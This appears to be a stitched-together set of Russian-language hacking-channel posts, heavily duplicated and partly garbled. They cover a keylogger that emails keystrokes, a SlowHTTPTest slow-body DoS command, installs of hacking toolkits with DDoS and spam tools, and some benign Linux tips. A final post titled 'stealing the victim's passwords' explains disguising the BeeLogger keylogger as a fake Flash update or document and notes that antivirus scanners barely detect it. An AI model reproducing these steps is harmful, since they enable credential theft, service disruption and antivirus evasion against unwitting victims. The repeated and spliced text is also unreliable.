5 пункт: Через сколько нажатий по клавиатуре нам на почту будет приходить сообщение? Пишем 200-300 символов
Все наш стиллер готов (ПРОЦЕС ЕГО СОЗДАНИЯ БЫЛ ПОКАЗАН ИСКЛЮЧИТЕЛЬНО В ОБУЧАЮЩИХ ЦЕЛЯХ)
Установка SlowHTTPTest
Установка для пользователей Kali Linux
Для пользователей Kali Linux установка через apt-get:
apt-get install slowhttptest
Использование SlowHTTPTest
slowhttptest это потрясающий инструмент, который позволяет делать многие вещи. Далее только несколько примеров использования.
Пример использования в режиме slow body a.k.a R-U-Dead-Yet, результаты только выводятся на экран
slowhttptest -c 65000 -B -i 10 -r 2000 -s 8192 -t FAKEVERB -u (адрес сайта) -x 10 -p 3
Главное проводить DoS атаки на сайтах на которых это разрешено например как: http://scanme.nmap.org/
Вывод по SlowHTTPTest
В зависимости от выбранного уровня детальности, вывод может быть как простым в виде генерируемых каждый 5 секунд сообщений, показывающих статус соединений (это при уровне 1), так и полным дампом трафика (при уровне детальности 4).
-g опция означает создание файла CSV, а также интерактивного HTML, основанного на инструментах Google Chart.
Приведённые выше скриншоты показывают состояние соединений и доступность сервера на различных этапах времени, а также дают общую картину поведения конкретного сервера под конкретной нагрузкой во время заданного временного интервала.
Файл CSV может быть полезен в качестве источника для вашего любимого инструмента по работе с данными, среди них могут быть MS Excel, iWork Numbers или Google Docs.
Последнее сообщение, которые выводит программа при закрытии, этот статус завершения, они могут быть следующими:
"Hit test time limit" программа достигла лимита времени, заданного аргументом -l
No open connections left” пир закрыл все соединения
Cannot establish connection” не было установлено соединений за время N секунд теста, где N или величина аргумента -i, или 10 (значение по умолчанию). Это может случиться если нет маршрута к удалённому хосту или пир лёг.
“Connection refused” удалённый сервер не принимает соединения (может быть только от тебя? Попробуйте использовать прокси) на определённом порту
“Cancelled by user” вы нажали Ctrl-C или отправили SIGINT каким-либо другим образом
“Unexpected error” не должно никогда случаться.
Рекомендации по тестированию DoS
DoS атака чужих серверов без разрешения, особенно успешная, является преступлением, в том числе в РФ
При атаке на локалхост (особенно на маломощных и виртуальных машинах), тормоза сервера могут быть связаны не с DoS атакой, а с тем, что сама программа SlowHTTPTest заняла все ресурсы и сама по себе тормозит компьютер.
Если при атаке на удалённый хост программа пишет вам, что он недоступен, а при попытке открыть страницу веб-сайта в браузере действительно ничего не открывается, то не спешите радоваться. Вполне возможно, сто сработала защита от DoS атаки и ваш IP (временно) заблокирован. Для всех остальных сайт прекрасно открывается. Можете убедиться в этом сами, используя любой анонимайзер или прокси или подключившись через другого Интернет-провайдера.
Заключение
Это можно делать с Windows, Linux и даже с Mac. Если вы запустите несколько DoS инструментов, таких как GoldenEye, hping3 на один веб-сервер, то тогда его будет очень просто выбить.
Установка для пользователей Kali Linux
Для пользователей Kali Linux установка через apt-get:
apt-get install slowhttptest
Использование SlowHTTPTest
slowhttptest это потрясающий инструмент, который позволяет делать многие вещи. Далее только несколько примеров использования.
Пример использования в режиме slow body a.k.a R-U-Dead-Yet, результаты только выводятся на экран
slowhttptest -c 65000 -B -i 10 -r 2000 -s 8192 -t FAKEVERB -u (адрес сайта) -x 10 -p 3
Главное проводить DoS атаки на сайтах на которых это разрешено например как: http://scanme.nmap.org/
Вывод по SlowHTTPTest
В зависимости от выбранного уровня детальности, вывод может быть как простым в виде генерируемых каждый 5 секунд сообщений, показывающих статус соединений (это при уровне 1), так и полным дампом трафика (при уровне детальности 4).
-g опция означает создание файла CSV, а также интерактивного HTML, основанного на инструментах Google Chart.
Приведённые выше скриншоты показывают состояние соединений и доступность сервера на различных этапах времени, а также дают общую картину поведения конкретного сервера под конкретной нагрузкой во время заданного временного интервала.
Файл CSV может быть полезен в качестве источника для вашего любимого инструмента по работе с данными, среди них могут быть MS Excel, iWork Numbers или Google Docs.
Последнее сообщение, которые выводит программа при закрытии, этот статус завершения, они могут быть следующими:
"Hit test time limit" программа достигла лимита времени, заданного аргументом -l
No open connections left” пир закрыл все соединения
Cannot establish connection” не было установлено соединений за время N секунд теста, где N или величина аргумента -i, или 10 (значение по умолчанию). Это может случиться если нет маршрута к удалённому хосту или пир лёг.
“Connection refused” удалённый сервер не принимает соединения (может быть только от тебя? Попробуйте использовать прокси) на определённом порту
“Cancelled by user” вы нажали Ctrl-C или отправили SIGINT каким-либо другим образом
“Unexpected error” не должно никогда случаться.
Рекомендации по тестированию DoS
DoS атака чужих серверов без разрешения, особенно успешная, является преступлением, в том числе в РФ
При атаке на локалхост (особенно на маломощных и виртуальных машинах), тормоза сервера могут быть связаны не с DoS атакой, а с тем, что сама программа SlowHTTPTest заняла все ресурсы и сама по себе тормозит компьютер.
Если при атаке на удалённый хост программа пишет вам, что он недоступен, а при попытке открыть страницу веб-сайта в браузере действительно ничего не открывается, то не спешите радоваться. Вполне возможно, сто сработала защита от DoS атаки и ваш IP (временно) заблокирован. Для всех остальных сайт прекрасно открывается. Можете убедиться в этом сами, используя любой анонимайзер или прокси или подключившись через другого Интернет-провайдера.
Заключение
Это можно делать с Windows, Linux и даже с Mac. Если вы запустите несколько DoS инструментов, таких как GoldenEye, hping3 на один веб-сервер, то тогда его будет очень просто выбить.
Мини публикация
Универсальный набор инструментов для хакинга
VARIOUS (https://github.com/Err0r-ICA/VARIOUS.git) — универсальная утилита с всевозможными скриптами для хакинга.
Установка
git clone https://github.com/Err0r-ICA/VARIOUS.git
cd VARIOUS
Запуск
python3 Various
Далее вводим пароль: ICA
Выбираем утилиту и скачиваем. Эти утилиты устанавливлюются в папку(ROOT) , через интерфейс VARIOUS оно работать не будет, все надо будет запускать вручную.
Универсальный набор инструментов для хакинга
VARIOUS (https://github.com/Err0r-ICA/VARIOUS.git) — универсальная утилита с всевозможными скриптами для хакинга.
Установка
git clone https://github.com/Err0r-ICA/VARIOUS.git
cd VARIOUS
Запуск
python3 Various
Далее вводим пароль: ICA
Выбираем утилиту и скачиваем. Эти утилиты устанавливлюются в папку(ROOT) , через интерфейс VARIOUS оно работать не будет, все надо будет запускать вручную.
Как установить мультимедийные кодеки
Некоторые мультимедийные кодеки не предустановлены в большинстве операционных систем Linux для воспроизведения мультимедийных файлов, таких как MP3, MPEG4 и AVI.
Для операционной системы Debian / Ubuntu вы можете установить их с помощью следующей команды:
Некоторые мультимедийные кодеки не предустановлены в большинстве операционных систем Linux для воспроизведения мультимедийных файлов, таких как MP3, MPEG4 и AVI.
Для операционной системы Debian / Ubuntu вы можете установить их с помощью следующей команды:
sudo apt-get install ubuntu-restricted-extrasДля операционных систем RHEL / CentOS / Fedora установите все кодеки с помощью следующей команды:
sudo yum install https://download1.rpmfusion.org/{free/fedora/rpmfusion-free,nonfree/fedora/rpmfusion-nonfree}-release-$(rpm -E %fedora).noarch.rpm
sudo yum install gstreamer1-libav gstreamer1-plugins-ugly unrar compat-ffmpeg28 ffmpeg-libsМеняем HOSTNAME в линукс
Редактируем файлы
Hostname прописывается также в файле
Проверка результата
Чтобы проверить, изменилось ли значение
Редактируем файлы
/etc/hostname и /etc/hosts
Способ изменения Hostname — это ручное редактирование файла /etc/hostname и файла /etc/hosts.
Сначала выполните команду (вместо pingvinus укажите свое значение):hostname pingvinusОтредактируем файл /etc/hostname для редактирования в редакторе nano, выполняем команду:
nano /etc/hostnameИзмените текущее значение в файле на новое. Сохраните изменения и закройте файл. Это можно сделать, нажав Ctrl+C, затем Y и Enter.
Hostname прописывается также в файле
/etc/hosts, поэтому нужно изменить его значение в этом файле. Откроем файл:nano /etc/hostsНайдите строку вида
«127.0.0.1 ваш_hostname» и впишите новое имя хоста. Сохраните изменения и закройте файл.Проверка результата
Чтобы проверить, изменилось ли значение
Hostname, откройте новое окно терминала и введите команду:▪️hostnameСборник утилит на все случаи жизни
WannaTool - каталог инструментов которые точно вам смогут пригодиться в дальнейшей жизни.
К примеру в WannaTool есть DDoS или Admin Panel finder, WhatsApp Spammer. Кроме хакерских инструментов WannaTool содержит в себе безобидные утилиты как Google переводчик, пасьянс.
Установка:
$
$
WannaTool - каталог инструментов которые точно вам смогут пригодиться в дальнейшей жизни.
К примеру в WannaTool есть DDoS или Admin Panel finder, WhatsApp Spammer. Кроме хакерских инструментов WannaTool содержит в себе безобидные утилиты как Google переводчик, пасьянс.
Установка:
$
git clone https://github.com/Err0r-ICA/WannaTool
$ cd WannaTool
$ chmod +x *
Использование:$
bash WannaToolКак защититься от сетевых атак?
Как ни странно, DDOS и MITM - это самый распространённый вид хакерских атак на хостинги. В данном посте пойдёт речь об инструменте, способном защитить хост от различного рода атак и сканирования (Nmap), а также с возможностью анонимизации трафика.
Установка:
$
$
$
$
Как ни странно, DDOS и MITM - это самый распространённый вид хакерских атак на хостинги. В данном посте пойдёт речь об инструменте, способном защитить хост от различного рода атак и сканирования (Nmap), а также с возможностью анонимизации трафика.
Установка:
$
git clone https://github.com/cryptolok/GhostInTheNet.git
$ cd GhostInTheNet/
$ chmod +x GhostInTheNet.sh
Использование:$
sudo GhostInTheNet.sh on eth0
Но рекомендуется перед этим отключить сетевой интерфейс:$
sudo GhostInTheNet.sh eth0 down
service network-manager stop
Выключение GhostInTheNet:$
./GhostInTheNet.sh off eth0
Вся подробная информация на GitHub📔Новая статья для вас) С полезными утилитами для начинающих. https://teletype.in/@artem-14577/pleznye_ytiliti
Teletype
Полезные утилиты в linux [Для начинающих]
Иногда бывает что очень нужна какая нибудь утилита, а названия мы ее не знаем, но она скорее всего есть в системе. Ниже будет небольшой...
Воруем пароли жертвы
Beelogeer - это электронный кейлоггер с открытым исходным кодом. Это мощный инструмент и скрытый инструмент, который можно замаскировать под фейковое обновление Adobe Flash, документ Word, Pdf или Pptx.
Установка:
$
$
Beelogeer - это электронный кейлоггер с открытым исходным кодом. Это мощный инструмент и скрытый инструмент, который можно замаскировать под фейковое обновление Adobe Flash, документ Word, Pdf или Pptx.
Установка:
$
apt install git python
$ git clone https://github.com/4w4k3/BeeLogger.git
$ cd BeeLogger
$ bash install.sh
Использование:$
python bee.py
Генерируем подходящий нам файл цифрами. Из приятностей — VirusTotal почти не детектедит наш файл.